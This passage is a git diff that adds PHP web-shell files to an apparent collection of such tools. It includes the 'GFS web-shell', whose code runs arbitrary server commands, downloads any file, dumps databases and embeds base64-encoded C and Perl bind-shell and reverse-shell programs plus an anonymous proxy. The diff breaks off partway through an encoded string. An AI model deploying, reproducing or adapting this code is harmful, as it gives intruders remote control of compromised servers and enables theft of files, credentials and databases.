+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////ÔÓÍÊÖÈÈ/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //Ïîâòîğåíèå ñèìâîëà
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //Âûïîëíåíèå êîìàíäû
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //Âûâîä SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //÷èòàåì ïàïêó
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //îïğåäåëåíèå ñâîéñòâ
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //Îòêğûòü ôàéë
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>   ".$fil."   </b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "
\ No newline at end of file
diff --git a/138shell/G/gfs_sh.php.txt b/138shell/G/gfs_sh.php.txt
new file mode 100644
index 0000000..dd6c601
--- /dev/null
+++ b/138shell/G/gfs_sh.php.txt
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
